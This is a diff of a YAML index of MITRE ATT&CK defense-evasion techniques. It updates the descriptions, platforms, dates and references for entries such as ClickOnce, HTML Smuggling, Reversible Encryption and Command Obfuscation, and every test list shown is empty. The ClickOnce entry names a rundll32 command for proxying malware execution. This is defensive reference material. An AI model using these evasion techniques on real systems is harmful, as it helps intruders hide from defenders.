+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -11632,10 +11888,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -11672,40 +11927,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11714,20 +11939,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -11757,7 +12012,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11800,8 +12055,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -11848,7 +12101,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11914,12 +12167,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -11974,33 +12225,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12021,6 +12323,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12035,22 +12338,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12108,48 +12431,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12171,6 +12463,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12181,23 +12474,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12238,8 +12558,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12275,43 +12596,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
